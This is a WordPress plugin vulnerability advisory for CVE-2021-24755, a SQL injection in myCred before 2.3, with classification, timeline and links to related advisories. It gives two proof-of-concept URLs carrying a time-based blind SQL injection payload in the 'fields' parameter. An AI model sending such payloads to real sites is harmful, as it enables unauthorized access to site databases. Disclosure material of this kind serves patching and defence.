WordPress Plugin Vulnerabilities

myCred < 2.3 - Subscriber+ SQL Injection

Description

The plugin does not validate or escape the fields parameter before using it in a SQL statement, leading to an SQL injection exploitable by any authenticated user

Proof of Concept

(any authenticated user) https://example.com/wp-admin/users.php?page=mycred_default-history&fields=%28SELECT+5703+FROM+%28SELECT%28SLEEP%2810%29%29%29NXIL%29

(admin) https://example.com/wp-admin/admin.php?page=mycred&fields=%28SELECT+5703+FROM+%28SELECT%28SLEEP%2810%29%29%29NXIL%29

Affects Plugins

Plugin icon
mycred
Fixed in 2.3

References

CVE
CVE-2021-24755

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
7.7 (high)

Miscellaneous

Original Researcher
bl4derunner
Submitter
Anton Sarsadskikh
Verified
Yes
WPVDB ID
01419d03-54d6-413d-9a67-64c63c26d741

Timeline

Publicly Published
2021-11-01 (about 2 years ago)
Added
2021-11-01 (about 2 years ago)
Last Updated
2022-04-13 (about 2 years ago)

Other

Published
Title
Published
2022-04-28
Title
Hermit <= 3.1.6 - Subscriber+ SQLi
Published
2014-08-01
Title
ipfeuilledechou - SQL Injection
Published
2023-10-29
Title
ImageLinks Interactive Image Builder < 1.6.0 - Admin+ SQLi
Published
2015-07-15
Title
Auto Affiliate Links < 5.0 - Authenticated Blind SQL Injection
Published
2015-07-19
Title
WR ContactForm <= 1.1.9 - Authenticated SQL Injection